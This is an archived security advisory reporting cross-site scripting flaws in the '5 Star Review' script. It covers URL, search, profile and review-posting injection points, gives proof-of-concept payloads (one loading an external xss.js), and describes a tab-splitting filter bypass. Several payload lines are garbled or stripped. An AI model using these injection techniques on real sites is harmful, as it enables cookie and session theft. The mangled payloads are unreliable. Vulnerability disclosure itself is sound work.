TUCoPS :: Web :: Specific Sites :: b06-2902.htm

5 Star Review - review-script.com - XSS w/ cookie output
5 Star Review - review-script.com - XSS w/ cookie output
5 Star Review - review-script.com - XSS w/ cookie output


5 Star Review Script=0D
=0D
Homepage:=0D
http://www.review-script.com/=0D 
=0D
Effected files:=0D
index2.php=0D
report.php=0D
search box=0D
editing your profile=0D
posting a review.=0D
----------------------------------=0D
=0D
index2.php XSS Vuln with cookie disclosure:=0D
=0D
By ending quotes and using a few closing and opening tags before and after, we can insertour script code and produce =0D
=0D
this vulnerability.=0D
=0D
'>http://www.example.com/index2.php?pg=2&item_id=11&sort=review.id'>">'> 
=0D
com/xss.js><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c57a8ca2d57d=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/5star1.jpg=0D 
http://www.youfucktard.com/xsp/5star2.jpg=0D 
=0D
=0D
Aftering clicking the "Email a friend this link" we notice our text partyl is still on the screen aswell, dueto the cookie.=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/5star3.jpg=0D 
=0D
--------------------------------------=0D
=0D
report.php XSS Vuln same as above:=0D
=0D
'><"<"<"<"=0D">http://www.example.com/report.php?id=970&item_id=251'>">'><"<"<"<"=0D 
=0D
Again, the cookie data is output on our screen.=0D
=0D
--------------------------------------=0D
search_reviews.php XSS Vuln:=0D
=0D
One way to achive this XSS example would be to use long UTF-8 Unicode encoding without semicolons. For PoC try =0D
=0D
putting this in the search box:=0D
=0D
'>">'<"<"<"<"=0D
=0D
=0D
Now, if we try touse '>">'><"<"<"<" Like the previous results, we get a screen spammed full of "javascript is not allowed" which goes all the way across, and down several =0D 
=0D
screens.=0D
=0D
Screenshot:=0D
=0D
http://www.youfucktard.com/xsp/5star4.jpg=0D 
=0D
---------------------------------------------=0D
=0D
Editing your profile XSS Vuln:=0D
=0D
For aPoC try using no filtering at all:=0D
=0D
=0D 
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/5star5.jpg=0D 
http://www.youfucktard.com/xsp/5star6.jpg=0D 
=0D
------------------------------------------=0D
=0D
When posting a review, theres many ways to bypass the filters they use. The way I used in thisscreenshot was to put a =0D
=0D
tab between jav   ascript. For aPoC make sure tabs on and enter:=0D
=0D
  =0D
=0D
Screenshots:=0D
=0D
http://www.youfucktard.com/xsp/5star7.jpg=0D 
http://www.youfucktard.com/xsp/5star8.jpg=0D 
=0D
-----------------------------------------------=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH